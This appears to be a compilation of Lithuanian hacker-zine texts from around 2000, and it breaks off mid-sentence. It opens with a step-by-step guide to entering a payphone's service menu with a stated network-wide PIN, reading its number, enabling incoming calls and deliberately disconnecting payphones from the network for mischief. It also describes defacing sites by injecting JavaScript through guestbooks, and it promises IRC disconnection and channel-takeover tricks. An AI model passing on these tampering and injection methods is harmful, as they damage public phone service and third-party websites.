kitas funkcijas ir gauti ish jo aibe naudingos informacijos. Taksofonas
valdomas per meniu, labai panashu i mobiliuju telefonu meniu, ir jeigu
jums kada teko naudotis mobiliaku, jus visai nesunkiai susigaudysite.

Visa informacija taksofone pateikiama dvieju eilucziu skystuju kristalu (LCD)
ekrane (tame pacziame, kuriame jus matote jusu renkama numeri ir kiek jums
liko kreditu). Musu tekste mes vaizduosime tai, ka jus matote ekrane
kvadratiniuose skliaustuose, pvz:

[IDEKITE KORTELE ARBA]
[NEMOKAMAS NUMERIS ]

Tai, ka jus renkate taksofono klaviaturoje, vaizduosime figurinese
skliaustuose, pvz:

{8191} – reishkia suspaudzhiame mygtukus 8 1 9 1

Paaishkinimas visishkam idiotui: klaviatura – tai taksofono mygtukai. 🙂

Taigi.
I meniu ieinama ivedus PIN koda , kurio uzklausimas pasirodo taksofono
LCD monitoriuje *stipriai* pakelus apatini-kairiji taksofono kampa.
Ishtikruju jis turi pasiridyti atidarius taksofona specialiuoju raktu,
bet pakelus taksofono kampa mes emuliuojame jo atidaryma.

[PIN CODE ? : ]
[ ]

Pin kodas yra keturiu skaitmenu ir dabar visoje Lietuvoje galiojantis pin
kodas yra 3707.
Noredami ieiti i meniu surenkame:

{3707}

Ivedant pin koda, skaicziu ekrane nesimato, juos atstoja simbolis ‘*’:

[PIN CODE ? : *** ]
[ ]

Ivedus pin koda, ekrane pasirodo pirmoji meniu opcija
(opcija – meniu punktas):

[SETTINGS ]
[ ]

Taksofono meniu yra valdomas taksofono mygtuku pagalba.
Mygtuku reikshmes:

<- 7 (i kaire: parodo sekanczia einamojo meniu opcija)
-> 9 (i desine: parodo priesh tai esanczia einamojo meniu opcija)
8 (iseiti is submeniu i aukstesnio lygio meniu)
0 (ieiti i submeniu arba keisti reiksme)
* (BACKSPACE funkcija – ishtrina paskutini ivesta skaitmeni)
# (ENTER funkcija – patvirtina pasirinktus ar ivestus duomenis )

Meniu struktura
Meniu susideda ish opciju, kurias pasirinkus ieinama i kitus submeniu
(gylesnio lygio meniu), parodoma tam tikra informacija arba atliekamos
tam tikros operacijos.

Pagrindinis meniu
Pagrindinis meniu turi 6 opcijas, kurios pasirenkamos klavishais {7} arba {9}
Sekanti opcija pasirenkama klavishu {9}, priesh tai buvusi – {7}.
Pagrindinio meniu opcijos:

[SETTINGS ]
[ ]
parametru meniu

[COMMISSIONING ]
[ ]
prijungimo prie tinklo meniu

[DECOMMISSIONING ]
[ ]
atjungimo nuo tinklo meniu

[MAINTENANCE ]
[ ]
informacija ir testavimas

[CHANGE BATTERY ]
[ ]
bateriju keitimas

[SOFT INFOS ]
[ ]
skambucziu statistika

I kiekviena opcija ieinama paspaudus klavisha {0}, o isheinama i aukshtesnio
lygio meniu (shiuo atveju – pagrindini meniu) paspaudus klavisha {8}

1. Opcija SETTINGS (parametru meniu)
Iejus i shia opcija {0} galima matyti ir keisti kai kuriuos taksofono
parametrus. Virshutineje eiluteje rodomas parametro pavadinimas, o
apatineje – einamoji parametro reikshme, kuria galima keisti. Parametrai
pasirenkami klavishais {9} arba {7}. Parametru reikshmes keicziamos taip pat
klavishu {0}

Parametrai:

1.1 DIAL MODE parametras – nustato numerio rinkimo buda ir gali buti:

[DIAL MODE : ]
[LDD (PULSE) ]
pulsinis rinkimas
arba

[DIAL MODE : ]
[MFD (DTMF) ]
toninis rinkimas

1.2 CHARGING MODE parametras – nustato pokalbio apmokestinimo buda ir gali
buti:

[CHARGING MODE : ]
[TARIF TABLE ]
pagal tarifu lentele
arba

[CHARGING MODE : ]
[METER PULSES ]
skaicziuojant pulsus

1.3 CALL START CRITERIA parametras – nustato pokalbio pradzhios pozhymi ir
gali buti:

[CALL START CRITERIA:]
[POLARITY REVERSAL ]
poliarishkumo pasikeitimas
arba

[CALL START CRITERIA:]
[METER PULSES ]
skaicziuojant pulsus

1.4 INCOMING CALLS parametras – nustato ar leisti ieinanczius skambuczius
ir gali buti:

[INCOMING CALLS ]
[ALLOWED ]
i taksofona paskambunti galima
arba

[INCOMING CALLS ]
[NOT ALLOWED ]
i taksofona paskambinti negalima.

1.5 DEFAULT LANGUAGE parametras – nustato pagrindine taksofono tarnybiniu
praneshimu kalba ir gali buti:

[DEFAULT LANGUAGE : ]
[LITHUANIAN ]
lietuviu
arba

[DEFAULT LANGUAGE : ]
[ENGLISH ]
anglu

Nepaisant shio parametro, pats meniu visada bus rodomas anglu kalba.

1.6 LINE CURRENT parametras:

[LINE CURENT : 37mA ] – tel. linijos sroves stiprumas mikroamperais
[BATTERY TO PLUG: YES] – parodo, ar galimas maitinimas nuo bateriju

Shio parametro negalima keisti ir jis yra informacinio pobudzhio

1.7 – 1.10 Garso parametrai decibelais:

1.7
[MICRO GAIN DELTA : ] – mikrofono
[ 0 dB ]

1.8
[DTMF GAIN DELTA : ] – toninio rinkimo
[ 0 dB ]

1.9
[MODEM GAIN DELTA : ] – modemo
[ 0 dB ]

1.10
[EARPHONE GAIN DELTA:] – ausines
[ 0 dB ]

Shiuos parametrus galima keisti klavishais {NEXT CALL} – padidinti ir
{NEXT CARD} – sumazhinti.
NEXT CALL klavishas – treczias ish virshaus kaireje eileje
NEXT CARD klavishas – apatinis kaireje eileje

2.Opcija COMMISSIONING – taksofono ijungimo i tinkla parametrai:

2.1.PAYPHONE ID parametras – numeris, kuriuo shis taksofonas figuruoja
tinkle.

[PAYPHONE ID : ]
[27320914 # ]

Kauno apskrityje shis numeris yra ir taksofono telefono numeris:
27 – Kauno kodas, 320914 – numeris
Vilniuje taksofono numeracija kiek kitokia

2.2.REMAS PHONE NUMBER parametras – stoties, kuri aptarnauja shi
taksofonu tinkla telefono numeris. Juo taksofonas susisiekia su stotimi
vykdant ijungimo i tinkla ar ishjungimo ish tinklo funkcijas

[REMAS PHONE NUMBER:]
[360660 ]

Shiaip paskambinus shiuo numeriu ishgirsite modemo tona.

2.3.COMMISSIONING meniu punktas vykdo taksofono ijungimo i tinkla
funkcija

[COMMISSIONING (#) ]
[ ]

Funkcijos ivykdymui reikia paspausti {#}. Ekrane pasirodo uzhrashas

[COMMISSIONING ]
[IN PROGRESS. ]

ir ragelyje girdisi kaip taksofonas renka REMAS numeri ir paskui
modemas perduoda informacija

3.Opcija DECOMMISSIONING – taksofono ishjungimas ish tinklo. Iejus i ja
matome tik viena meniu punkta:

3.1. DECOMMISSIONING meniu punktas – vykdo taksofono ishjungimo ish tinklo
funkcija

[DECOMMISSIONING(#)]
[ ]

Funkcijos ivykdymui reikia paspausti {#}. Funkcija veikia analogishkai
COMMISSIONING funkcijai, tik informacijos perdavimas vyksta trumpiau.

4.Opcija MAINTENANCE – informacija ir testavimas

Punktai:
4.1.SOFTWARE RELEASE
VXX.XX # (02.07)
4.2.PARAMETERS
VXX.XX # (00.01)
4.3.CARDS ACCEPTANCE
VXX.XX # (01.11)
4.4.CALL CATEGORIES
VXX.XX # (01.36)
4.5.TT INT. NUMBERS
VXX.XX # (01.36)
4.6.TT NAT. NUMBERS
VXX.XX # (01.36)
4.7.TT DAYS
VXX.XX # (01.36)
4.8.TT SCHEDULES
VXX.XX # (01.36)
4.9.TT TARIFFS
VXX.XX # (01.36)
4.10.TT MEANS OF PAYMENT
VXX.XX # (00.00)

Parodo taksofono programines irangos versiju numerius. Shiu parametru ish
klaviaturos pakeisti negalima.

4.11.DATE/TIME punktas – parodo einanczia data ir laika:

[DATE : 99/05/31 ] – data
[TIME : 09:11:23 ] – laikas

4.12.- 4.20 punktai – Taksofono testai

4.12
<-
[? ? ? ? ? ? ? ? ? ? ]
[ ? ? ? ? ? ? ? ? ? ?]
LCD ekrano testas
4.13
->
[ ? ? ? ? ? ? ? ? ? ?]
[? ? ? ? ? ? ? ? ? ? ]

4.14 Ragelio testas – Taksofonas patikrina ragelio veikima.

4.15 Mygtuku testas

[PUSH KEY 1 ] Analogishkai patikrinami visi mygtukai
[ ]

po kurio pasirodo uzhrashas

[PAYPHONE COMPARTMENT]
[ACCESS(39) ]

4.16 Korteles testas

[INSERT A CHIP CARD ]
[THEN PRESS # ]

Ikishus kortele ir paspaudus {#} pamatome uzhtasha

[DEBIT ONE UNIT (#) ]
[ ]

Dabar paspaudus {#} taksofonas nuims nuo korteles viena kredita

4.17. Kalibravimas.

[INSERT A CHIP CARD ]
[START CALIBRATION(#)]

Idejus kortele ir paspaudus {#} taksofonas atlieka kalibravima

4.18. ANTIWIRING’o testas , reikalinga “WIRE” kortele.

[INSERT A WIRE CARD ]
[TEST ANTIWIRING (#)]

Paspaudus {#} taksofonas atlieka testa.

4.18. Slotu Testas – patikrina lizdus ishpletimo blokams
Testas atliekamas automatishkai:

[SMTEST ]
[IN PROGRESS. ]

o atlikus testa pasirodo rezultatai:

[SLOT1 : SM 6506 ] – pirmame lizde modulis 6506
[SLOT2 : BAD SM ] – antras lizdas tushczias

4.19. Ryshio su telefono stotimi patikrinimas:

[REMAS CONNECTION ]
[ ]

Paspaudus {#} taksofonas renka REMAS numeri ir ragelije girdimi modemo garsai

[CONNECTION ]
[IN PROGRESS. ]

sekmingai atlikus shi testa pasirodo uzhrashas

[SUCCESFUL TRANSMIS.]
[ ]

5. Opcija BATTERY CHANGE – skirta bateriju pakeitimui ir turi tik viena
punkta:

[CHANGE THE BATTERY ]
[THEN PRESS # ]

6.Opcija SOFT INFOS – skambucziu statistika.
Siame skyriuje issaugoma 30 (00-29) is taksofono rinktu numeriu.
Kartu issaugojama data ir laikas. Pvz:

[(00) 0 X 02000002 ]
[ 05/15 17:58 ]

Turekite omeny, kad telefono numeriai saugomi ne deshimtainiu formatu,
o greicziausia sheshioliktainiu, tixliai nezhinau, neturejau laiko
nagrineti, kol rashiau shi trumpa failiuka, tad jums teks patiems tai
ishsiaishkinti 🙂

Ishejimui ish meniu reikia isheiti ish submeniu i pagrendini meniu klavisho
{8} pagalba, pagrindiniame meniu taip pat paspausti {8} ir pasirodzhius
uzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ]
[LOCAL MAINTENANCE? ]

patvirtinti savo pasirinkima klavishu {#}.
Pasirodzhius praneshimui

[HANG UP, CLOSE THE ]
[DOOR AND REMOVE CARD]

padeti rageli.

O dabar, kaip tuo pasinaudoti praktishkai?

Pvz.1:
Jus stovite Kaune, Laisves alejoje ir jums zhutbut reikia aptarti viena
reikala su draugeliu, kuris dabar yra namuose, jusu mobiliako akumas
nusedes, o taksofono korteleje liko tik vienas kreditas.
Isheitis – tegul jusu draugelis perskambina jums i taksofona.
Bet Laisves alejoje nei ant vieno taksofono nera uzhrashytas jo numeris,
o dauguma Kauno taksofonu neleidzhia i juos paskambinti.
Taigi, jus einate prie artimiausio taksofono. Jums reikia suzhinoti jo numeri
ir atblokuoti ieinancziojo ryshi funkcija:

1.) Pakeliate kairiji taksofono kampa ir matote pin kodo uzhklausima

[PIN CODE ? : ]
[ ]

2.) Ivedate pin koda: {3707} ir matote pirmaja opcija:

[SETTINGS ]
[ ]

3.) Ieinate i submeniu paspaudus klavisha {0} ir matote submeniu punkta:

[DIAL MODE : ]
[MFD (DTMF) ] – czia gali buti ir PULSE uzhrashas

4.) “Prasukate” meniu su klavishu {9} per 3 punktus (spaudzhiate ji 3 kartus)
kol ekrane pasirodys meniu punktas

[INCOMING CALLS ]
[NOT ALLOWED ]

5.) Pakeicziate shi parametra paspaude klavisha {0} ir matote:

[INCOMING CALLS ]
[ALLOWED ]

Dabar i shi taksofona galima paskambinti. Jeigu parametras ALLOWED
jau buvo nustatytas jums iejus i shi meniu punkta, vadinasi jums
pasiseke ir nieko czia keisti nereikia . Abiem atvejais, isheiname i
pagrindini meniu klavishu {8} ir vel matome opcija

[SETTINGS ]
[ ]

6.) “Prasukate” pagrindini meniu su klavishu {9} viena karta, kol ekrane
pasirodo opcija

[COMMISSIONING ]
[ ]

Ieinate i ja su klavishu {0} ir ishkart matote parametra

[PAYPHONE ID : ]
[27320914 # ]

Taigi, czia ir yra taksofono telefono numeris, kur 27 – Kauno kodas,
o 320914 – numeris.

7.) Isheinate i pagrindini meniu paspaude {8}, vel spaudzhiate {8}.
ir pasirodzhius uzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ]
[LOCAL MAINTENANCE? ]

patvirtinkite savo pasirinkima klavishu {#}.
Pasirodzhius praneshimui

[HANG UP, CLOSE THE ]
[DOOR AND REMOVE CARD]

padekite rageli. Dabar su jusu vieninteliu kreditu skambinate savo
draugeliui ir prashote, kad perskambintu telefonu, kuri jus matete ekrane
(musu pavizdyje – 320914, arba jeigu jusu draugelis yra kitame mieste –
8-27-320914) ir padeje rageli laukiate skambuczio. Suskambejus taksofonui,
pakeliate rageli ir kalbates 🙂 Jusu pokalbio metu ekranas atrodys taip:

[IEINANTIS RYSYS ]
[ ]

o jusu draugeliui uzh pokalbi teks moketi tiek pat, kiek skambinant iprastu
telefono numeriu.

Pvz.2:
Jums ish chuliganishku ar kitokiu paskatu reikia, kad niekas ishskirus jus
negaletu paskambinti ish tam tikro taksofono :). Jums tereikia atjugti shi
taksofona nuo tinklo (kitais zhodzhiais – uzhblokuoti ji):

1.) Ieinate i taksofono meniu kaip nurodyta pirmame pavizdyje ir ishsirenkate
opcija

[DECOMMISSIONING ]
[ ]

2.) Ieinate i ja su klavishu {0} ir pamate

[DECOMMISSIONING (#)]
[ ]

Spaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri ir
modemu perduoda informacija. Tuo metu ekrane matote

[DECOMMISSIONING ]
[IN PROGRESS. ]

Kai taksofonas baigia informacijos perdavima, ekrane pasirodo:

[DECOMMISSIONING ]
[OK ]

3.) Dabar jus galite isheiti ish meniu kaip nurodyta pirmame pavizdyje ir
padeti rageli. Po to, kai jus atjungete taksofona nuo tinklo, bet kas,
norintis paskambinti ish shio taksofono matys ekrane uzhrasha

[TIK SPEC. TARNYBU ]
[NUMERIAI ]

ir negales paskambinit jokiu numeriu ishskirus 01, 02, 03, 04 🙂

Noredami patys paskambinti, jus turesite vel ijungti shi taksofona i tinkla:

1.) Ieinate i taksofono meniu ir pasirenkate opcija

[COMMISSIONING ]
[ ]

2.) Ieinate i ja klavishu {0} , prasukate meniu su {9} kol ekrane pasirodys
punktas

[COMMISSIONING (#) ]
[ ]

ir paspaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri
ir modemu perduoda informacija. Tuo metu ekrane matote:

[COMMISSIONING ]
[IN PROGRESS. ]

Informacijos perdavimas gali uzhtrukti keleta minicziu, o kai baigiasi,
ekrane matome

[COMMISSIONING ]
[OK ]

Taksofonas ijungtas i tinkla 🙂

Jeigu kazhkas netvarkoj (pvz. klaidingai nustatyti taksofono parametrai)
arba informacijos perdavimas nepavyko, pasirodo uzhrashas

[COMMISSIONING ]
[NOT OK ]

Tada nustatykite tinkamus parametrus ir bandykite dar karta.

3.) Sekmingai atlike prijungimo funkcija, isheikite ish meniu kaip nurodyta
pirmame pvz. ir padekite rageli. Dabar galite skambinti.

Na ir dar vienas patarimas priesh pabaiga – butu nebloga ideja, priesh
zhaidzhiant su taksofono meniu, nusirashyti, kaip buvo nustatyti visi
kintami parametrai, kad prireikus juos butu galima atstatyti. Mes juk
nenorime, kad mieste neliktu nei vieno veikianczio taksofono 🙂

PABAIGOS ZHODIS: Prie viso to reiktu pazhymeti, kad ash asmenishkai nesu
telefonistas o czia pateikta informacija gauta praktiniu bandymu budu,
todel gali pasitaikyti netikslumu ar neaishkumu.
Jeigu jus turite kokiu nors pastebejimu ar galite pridurti ka nors daugiau,
jusu komentarai ir pasiulymai visada laukiami. Su manimi galite susisiekti
adresu: ww0lf@pogrindis.net

Knowledge is power!
ww0lf

-Pabaiga-
eof

17. Ouestbook hack

Puslapio hakinimas per guestbook’a Shtai dar vienas budas nuhakinti web puslapius! Taip buvo nuhakintas ir jaunimas.net ir daug kitu. Kai kurie rimtesni saitai turi apsauga nuo to bet daugumas tiesiog palieka likimo valiai! Tai va zhodziu viska ka tau reikia padaryti tai nueiti i ta puslapi su guest book’u ir parashyti vietoje tavo : “Sveiki man labai patiko jusu puslapis ir t.t.” 🙂 turiu omeni atsilepimu skiltie ar panashiai rashai tiesiog JavaScripta ir nieko daugiau > gali padaryti nuoroda i puslapi ir pan. Tai va zhodzhiu veikimo prinsipas yra toks kad kai irashai guestbooko teksta jis tiesiogiai ji irasho i savo html > nu jei html tai html tu jam duodi Java scripta ir viskas :))) Shtai keli java scripto pavyzdzhiai: Shi funkcija ishmes langeli su OK knopke kurioje bus tekstas : “HAc|{eD By Craft[Eye]” O shis paklaus ar tau 18 metu ir nuves i tam tikra puslapi 🙂 Na tai tiek 🙂 Kaip ash visada sakau Happy Hacking! Craft[Eye] – CraftEye@gmx.net

18. Hackeriai prieš crackerius

Kas yra hackeris?
Hackeris- jis turi išmanyti kompiuteryje.
Turi mokėti programuoti,nes be programavimo nelabai ką ir pahakins
Turi mokėti kalbas anglu ir rusu.
Neskubėti,visus savo veiksmus gerai apgalvoti.
Daug atiduoti pinigu už ineta 🙂
Niekada neturi galvoti, kad kas nors žino už jį daugiau ar mažiau, turi galvoti, kad žino mažiausiai ir reikia tobulintis.

Kuo skiriasi hackeris nuo Crackerio?

Hackeris – žmogus,kuris domisi įvairiomis operacinėmis sistemomis,

jų klaidomis,dažnai programuotojas.
Hackeriai dažnai sugalvoja būdus kaip įsilaužti,dažnai jie gerai išmano
technika.
Jie žino sistemos skyles ir ieško nauju.

Crackeris yra žmogus kuris daug išmanydamas apie “ineta”, ir tinklus griauna
apsaugos sistemas.Tai būdavo žmogus iššifruojantis užkoduota infa.
bet dabar Crackeriai įsilaužinėja į kitus kompus,su skirtingais tikslais:
Prisijunkti,sunaikinti infa, perskaityti ją, gauti passwordus ir t.t
Hackeriai dažnai naudojasi Crackeriu sukurtomis programomis,
Kad patikrintų tinklo saugumą ir t.t

Skirtumas yra toks,kad viskas ką crackeriai daro yra nelegalu.

Crackeriai niekada neišnyks, nes juk jau tokia žmogaus prigimtis naikinti viską kas sukurta.

Skeletaz
2000

19. Internet Hack

Lapkritis ‘Y2K
~23:00 val.

Kadangi esu tik begineriz(o gal tik sumautaz lameriz), taj kol kas mano txt’aj
informaciniaj.. na galbut atejz lajkaz, ir me sukurpz ka norz ql. na bet kol
kas tenkisnimes ir tuo. Tajp kad shis txt yra TIK informaciniz.. ajshq kajp
ir visi kiti :))

Hi, na taj kajp ejnasi?. oj, ne apie taj juk ash turechiau.. ajshq dabar
kajp visada nuo CraftEye gausiu pzd. kad kol isivazhiuoju nesamoniu priplepu
ir vis apie alu varau.. ;]] oky oky.. No alko now.. jau buvo diena alko dabar
ne.. :)) o dabar nesimiega.. yra chrustiq ir kavoz..na taj apie ka ten mes.. o
tajp apie Internet’a .. hmmm. o kas taj yra. gal su uogiene taj kramtoma..
Patiko chia presh kokiuz metuz kazhkokia radijos stotiz uzhdavine klausyma:
“Kas yra Internetas”.. oj tada taj prisiklausiaj visokiu sapaliojimu.Apie taj
kad I’netaz, taj begalo DIDELIZ ir galingas kompiuteris, arba kad taj
palydovas.. 🙂 Na manau, per metuz liaudiz jau daugiau apie taj suzhinojo.
So just read. sorry, kad be lietuvybez, dar nesusikonfiguravau
mandrake’o.
—————————————————–
Internet[pagal A.Petrovskij, B. Leontjev “Efektinvnij haking”]
***
Internet’az – taj didzhiausiaz kompiuteriniz tinklaz pasaulyje jungiantis
begalo daug kompiuteriu ivajriausiajz metodajz nuo telefoniniu liniju iki
palydovinio ryshio sistemu. Internet’e naudojamas protokolas TCP/IP, qriz
savyje turi”
# IP(Internet protokol) – tarptinklinis protokolaz, kuris prizhiuri
transliacija be jokiu papildomo tvarkymo perduodant duomenis ish vieno
ompiuterio kitam.
# UDP(User Datagram Protocol) – vartojishkas datagram’inis protokolas,
aptarnaujantis transliacija atskiru praneshimu, IP pagalba, be klaidu
tikrinimo.
#TCP(Transmissin Control Protocol) – perdavima kontroliuojantis protokolas,
aptarnaujantis transliacija IP pagalba tikrinantis susijungima.
Kiekvienas kompiuteriz , prijungtas prie I’neto gauna savo IP adresa.
Iternet’o adresa yra 4 bajtu dydzhio ir susideda ish dvieju daliu: tinklo ir
kompiuterio. Pirma dalis rejshkia logini tinkla, kuriam paskirtas adresas.
Antra dalis identifikuoja konkriachiaj ta kompiuteri tinkle.
Pagal susitarima, IP adresas yra ish skaijchiu ishkirtu tashkajz.pvz:
196.219.31.12
~~DNS~~
DNS(Domain Name System) – taj duomenu base, qri lajko informacija apie
kompiuteriuz,qrie yra ijungti i I’neta. Duomenu tipas priklauso nuo
kompiuterio, bet dazhniausiai taj IP adresas ir duomenys marshrutizacijaj.
Patogumo delej, daugelis kompiuteriu turi savo vardus, pvz:
Jonas, Petryte.. just jokin’ :)))
DNS vykdo keleta uzhduochiu, bet pagrindine jos uzhduotis pertvarkyti
kompiuteriu vardus i IP ir atgal. DNS erdve atrodo kajp domenu medis,
artejanchiajz prie medzhio shaknu. Medshio shaknys turi varda, po ja ejna
domenaj aukshtesnio lajpsnio(shakniez domenaj). Egzituoja dvi rushys
aukshto lajpsnio domenaj. USA aukshchiausio vajzduoja arganizacijos struktura.
Ir kajp tajsykle turi triju rajdzhiu varduz:
# .gov – valdzhios istajgoz
# .mil – karines istajgoz
# .com – komercines organizacijos
# .net – tinklo paslaugu tiekejaj
# .org – Ne pelno siekenchios organizacijos
# .edu – moxlo istajgoz
Del domenu uzh USA ribu susijusiu su teritorijos pasiskirstimu naudojami vardaj
ish dvieju rajdzhiu. pvz:
hakeriai.voras.lt – Lietuvoje(kazhi apie ka chia?:)
www.porno.ru – Rusija (geraz sajtaz beje 🙂

~~~Darbaz I’nete~~~
Na ajshq jej turi I’net’a taj ir gali kazhka jame daryti, tam yra rejkalingos
programoz, shtaj keletaz ish ju:
# ping – lejdzhia nustatyti lajka paketo nuejimo iki hosto. [kazhqr girdejau
kad ne vien tam pinginimaz yra naudojamz :]
# traceroute – parodo praejnanchiu paketu kelia kelia tinkle(Sux95 ir SuxNT –
tracert.exe)
# nslookup – lejdzhia perzhiureti DNS serveriu palajkima
# telnet – Nustato sujusijungima su nutolusiu kompiuteriu(23 portas) ir
lejdzhia dirbti nutolusio terminalo rezhime
# ftp – lejdzhia kejstis fajlajz naudojant FTP(File Transfer Protocol)
protokola(21 portas)
# finger – parodo informacija apie vartotojus dirbanchius tinkle.
Darbuj su WWW(World Wide Web) naudojamos programos Netscape Navigator vs
Internet Explorer, etc. Shioz programoz jungiasi su serveriu(80 portas) ir
dirba su protokolu HTTP.
————————————————
Na ka ir viskaz.. shiaj nakchiaj tiek. dabar tex sustot su txt. linux’u ir
viskuo kitu :((( Ne ne ne vyrukaj su juodajz drabuzhiajz beldzhiasi i duriz,
bet arteja, ne ne ir ne apokalipse. o sumauta sesija. ech. na o po to
palajma – 4T0$T0G0Z.. what’z ql.. .bu lajko viskam, i think so..
————————————————
Shi txt galima lajsvaj platinti, bet NIEKO nekejsti.
Kadangi tikraj nemanau, kad shis txt yra idealuz, taj laukiu patajsymu ir
klajdu tajsymu, bej pasiulymu y-majl: j-azz@centras.lt
================================================================
J-azz
#Ne, ash – ne hackeriz, tiesiog blogai miegojau.#

20. Keletas irc pamokėlių

ノヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘサ

コ . keletas IRC pamokeliu by mr2 . コ

ネヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘシ

“Communications without intelligence is noise;

Intelligence without communications is irrelevant.”

ノトトトトトトトトトトトトトトトトトサ

ウ <<< turinys >>> ウ

ネトトトトトトトトトトトトトトトトトシ

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ

ウ [[1]] tau uzdejo bana . o tau nors verk reikia ウ

ウ patekt i ta kanala 😉 ウ

ウ [[2]] hmm . neturiu jokio *IRC (nej mIRC . ウ

ウ nej pIRC . zodziu jokio) o tajp nera laiko ウ

ウ ji parsisiust ir tajp reikia pasikalbet ;((( ウ

ウ [[3]] kaip pasidaryti savo script ? (trumpai) ウ

ウ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ウ

ウ atjungiam chiuwaka ? (ir kajp nuo to paciam ウ

ウ apsisaugot) ウ

ウ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ウ

タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

ノトトトトトトトトトトトトトトトトトサ

ウ <<< textas >>> ウ

ネトトトトトトトトトトトトトトトトトシ

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ

ウ [[1]] tau uzdejo bana . o tau nors verk reikia ウ

ウ patekt i ta kanala 😉 ウ

タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

reikalas tame kad kartais (shiaip apie 30% atveju

(gal biski daugiau . gal maziau)) jei jums

kokiame taj kanle uzdejo bana . norint patekt

i ta kanla uztenka :

1) pasikeist nick’a arba .

2) Options/Connect/Identd/ . User ID: langelyje

pakeist UserId duomenis . (kad suveiktu reikia

diskonektintis ir vel konektintis) jei nepavyko

lieka trechias (tikraj nepaskutinis) .

3) (sis galima sakyt ish 2-ju daliu susidarantis

punktas priklauso dazniausiaj nuo to ka jus

prisidirbot tame kanale) reiskias parasot

“/names [#kanalo pavadinimas]” paziurit nick’us

su op’ais (priesajs nick’a @ pvz : @agurkaz) ir

paprasot jo nuimt bana . pvz :

“/msg agurkaz plz nuimk bana [#kanalo_pav] kanale

arba “/notice [#kanalas] nuimkit bana or smth”

(shiuo atveju zhinute gaus visi esantys kanale)

o kitas varijantas : jei kanalas kuriame gavot +b

sedi nedidelis skaicius zmoniu . taj paprastaj

nepraeina neij pora minuciu kaip nuimamas

banas . nes tokiuose kanaluose paprasciausiai

reikalinga liaudis kad ir kokia ji bebutu .

tam kad ten sedetu (rkp belaukian ar dar del kokiunors

kitu priezasciu) . 😉

(beabejo galima pasinaudoti proxi servu paslaugom .

bet apie taj chia nerashysiu (ir tajp jau daug kas

yra prirase apie proxius .))

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ

ウ [[2]] hmm . neturiu jokio *IRC (nej mIRC . ウ

ウ nej pIRC . zodziu jokio) o tajp nera laiko ウ

ウ ji parsisiust ir tajp reikia pasikalbet ;((( ウ

タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

kagi tokiu atveju daryt ? ogi tu kaijp speju sedi

prie windozes ? 😉 taj kokios problemos ? spaudi

start/run (arba win_klavisa+r) ir i langeli irashaj

“telnet” be ->”<- . (reiketu nueit i

terminal/preferences ir nusistatyt telnet’a . bet

shikart ne apie taj . padarysit taj ir be mano

pagalbos) tajgi pagrindiniam lange spaudi

connect/remote system . ir chia pvz :

host name : irc.omnitel.net

port : 6667

term type : vt100

spaudi connect . ir lauki kol pagrindiniam lange

vietoj “(none)” musu atveju pamatysi :

“irc.omnitel.net” . tada rasaj “user a a a a”

butinaj 4-ri (dabar neaiskinsiu kas taj) [enter]

tada rashaij “nick [jusu nick’as]” [enter] .

tada laukiat kol servas ishmes “ping [ir chia kaskox

skaicius]” . toliau rasai “pong [chia rasaij ta

skaiciu kuri gavaj ish servo]” . ir jus jau

prisijunge 😉 . toliau galit rasyt jau iprastas

komandas kaip “join #mr2” (taip . taip . chia

komandos rasomos be “/”) . tiesa jus susidursit

su viena problemele : chia norink kaska pasakyt pvz :

i kanala #mr2 reikia rasyt “privmsg #mr2 [jusu zinute]”

(patarciau parasyt “help” [enter] ir paziuret visas

komandas . nes kajp jau supratot nevisos komandos

tokios pacios kajp pvz: mIRC’e . (zodziu kas iesko

. tas randa) na o sedintiems po *NIX sistema manau

nebus sunku padaryti tapati 😉

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ

ウ [[3]] kaip pasidaryti savo script ? (trumpai) ウ

タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

taip taip taip . patikekit manim yra zymiai

maloniau tureti savo paties parasyta script (kaj

zinaj smulkiausias jo ipatybes) nej pasikliauti gana

daznaj backdorus turinchiais skriptajs . (shiaip

man neteko su tokiu script turet reikalu . bet ju

yra .) tiesiog parsisiuskit ircintro.hlp bei

mirc.hlp . (shie helpaj paprastaj buna kartu su

pachiu mIRC’u) na dar galite parsisiust numeric.hlp

. kurio praktiskaj neprireiks pradedanchiam

skript-kiddie . taj pradziai . toliau kaij suprasit

pagrindus patarciau parsisiusti keleta jau padarytu

skriptu . addon’u pvz : ish www.mircscripts.com .

www.mircx.com . ir dar dauk panasiu saijtu .

neslepsiu kad didele dali agurkaz-script parasiau

zvilkteledamas i kitu skriptus . pvz : “warmaster”

(savo laiku pac geriausias . nors jau pasenes yra

daug zmoniu visdar ji naudojanciu) . tiesa i savo

script neidejau ji ishgarsinusio TAKEOVER . shiaip

del kurio yra teke matyt autobana gaunanciu chiuvaku

bandanciu uzeijt i viena ar kita kanala . (vien

delto kad naudoja warmaster’i) . ir begale kitu

naujesniu ir netgi senesniu (juose kartajs net

lengviau susigaudyt nej naujuosiuose .) skriptu

kaip “matrix” “stigmata” ir t.t. (tiesa nepatariu

siustis didelia apimti uzimanciu skriptu nes juose

paprastaj be *.waw *.mp3 failiuku nieko gero ir

